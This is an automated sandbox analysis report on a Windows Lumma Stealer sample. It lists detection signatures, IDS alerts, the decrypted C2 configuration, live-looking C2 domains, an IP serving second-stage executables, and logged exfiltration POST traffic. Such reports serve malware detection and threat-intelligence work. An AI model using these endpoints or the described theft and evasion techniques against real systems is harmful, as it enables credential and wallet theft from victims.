Windows Analysis Report
goldlummaa.exe

Overview

General Information

Sample name: goldlummaa.exe
Analysis ID: 1577492
MD5: 876bf2dec67ea8626322d2c268219d76
SHA1: ecb0c0cd486733491804a05cf387f2d04d5e2279
SHA256: 08d37bbc1881f5fbfdcc84e3270320bb4d03a3ad4fcdf1d996c9de0ca8f2b425
Tags: 18521511316185215113209bulletproofexeLummaStealeruser-abus3reports

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • goldlummaa.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\goldlummaa.exe" MD5: 876BF2DEC67EA8626322D2C268219D76)
    • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • goldlummaa.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\goldlummaa.exe" MD5: 876BF2DEC67EA8626322D2C268219D76)
      • WerFault.exe (PID: 7848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 592 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 8184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1616 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["diffuculttan.xyz", "deafeninggeh.biz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "tacitglibbr.biz", "effecterectz.xyz", "immureprech.biz", "debonairnukk.xyz"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000003.1576307805.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000003.1576837970.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000003.00000003.1576336868.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
3.2.goldlummaa.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
3.2.goldlummaa.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T14:17:39.594103+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49722 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:41.765494+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49728 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:44.904371+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49734 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:49.032054+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49745 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:54.303194+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49756 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:59.203645+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49769 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:03.131445+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49780 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:11.769477+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49801 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:40.391480+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49722 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:43.299167+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49728 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:13.537532+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49801 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:40.391480+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9 | 49722 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:43.299167+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.9 | 49728 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:39.594103+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49722 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:41.765494+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49728 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:44.904371+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49734 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:49.032054+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49745 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:54.303194+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49756 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:59.203645+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49769 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:03.131445+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49780 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:11.769477+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49801 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:15.030238+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49807 | 185.215.113.16 | 80 | TCP
2024-12-18T14:17:38.040410+0100 | 2058230 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 62158 | 1.1.1.1 | 53 | UDP
2024-12-18T14:18:01.489309+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49769 | 104.21.50.161 | 443 | TCP

AV Detection

Source: https://tacitglibbr.biz/e | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/h | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/s | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/al6 | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/api. | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/perati | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/int16C | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/rs. | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz// | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/. | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/apiX | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/5nascr | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["diffuculttan.xyz", "deafeninggeh.biz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "tacitglibbr.biz", "effecterectz.xyz", "immureprech.biz", "debonairnukk.xyz"], "Build id": "LOGS11--LiveTraffic"}
Source: goldlummaa.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.1% probability
Source: goldlummaa.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor output:
  sordid-snaked.cyou
  awake-weaves.cyou
  wrathful-jammy.cyou
  debonairnukk.xyz
  diffuculttan.xyz
  effecterectz.xyz
  deafeninggeh.biz
  immureprech.biz
  tacitglibbr.biz
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  LOGS11--LiveTraffic
Source: C:\Users\user\Desktop\goldlummaa.exe | Code function: 3_2_00415298 CryptUnprotectData,3_2_00415298
Source: goldlummaa.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49780 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49801 version: TLS 1.2
Source: goldlummaa.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\goldlummaa.exe | Code function: 0_2_00C6BE9A FindFirstFileExW,0_2_00C6BE9A
Source: C:\Users\user\Desktop\goldlummaa.exe | Code function: 0_2_00C6BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00C6BF4B
Source: C:\Users\user\Desktop\goldlummaa.exe | Code function: 3_2_00C6BE9A FindFirstFileExW,3_2_00C6BE9A
Source: C:\Users\user\Desktop\goldlummaa.exe | Code function: 3_2_00C6BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00C6BF4B

Networking

Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49728 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49734 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49769 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49780 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49722 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.9:62158 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49801 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49745 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49756 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49722 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49769 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49722 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49728 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49728 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49801 -> 104.21.50.161:443
Source: Malware configuration extractor | URLs: diffuculttan.xyz
Source: Malware configuration extractor | URLs: deafeninggeh.biz
Source: Malware configuration extractor | URLs: wrathful-jammy.cyou
Source: Malware configuration extractor | URLs: awake-weaves.cyou
Source: Malware configuration extractor | URLs: sordid-snaked.cyou
Source: Malware configuration extractor | URLs: tacitglibbr.biz
Source: Malware configuration extractor | URLs: effecterectz.xyz
Source: Malware configuration extractor | URLs: immureprech.biz
Source: Malware configuration extractor | URLs: debonairnukk.xyz
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 18 Dec 2024 13:18:14 GMT; Content-Type: application/octet-stream; Content-Length: 1740288; Last-Modified: Wed, 18 Dec 2024 12:15:55 GMT; Connection: keep-alive; ETag: "6762bcfb-1a8e00"; Accept-Ranges: bytes
                    Source: Joe Sandbox ViewIP Address: 104.21.50.161 104.21.50.161
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49728 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49734 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49769 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49780 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49722 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49801 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49745 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.9:49807 -> 185.215.113.16:80
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49756 -> 104.21.50.161:443
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7MOPAZNNL5BSB8TEC5CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12857Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ORQDK9H7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15009Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HQNCZSSBDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20531Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2HTYL7EE2V9NXASFFZZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1246Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L0F67C2UNUCPCVBJERPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551737Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: global trafficDNS traffic detected: DNS query: tacitglibbr.biz
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/C
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/n
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe1dO
                    Source: goldlummaa.exe, 00000003.00000002.2085144049.00000000008FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeL
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeX
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/wU
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432304745.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1613022112.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1702688956.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/.
                    Source: goldlummaa.exe, 00000003.00000003.1521242036.00000000032E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz//
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/5nascr
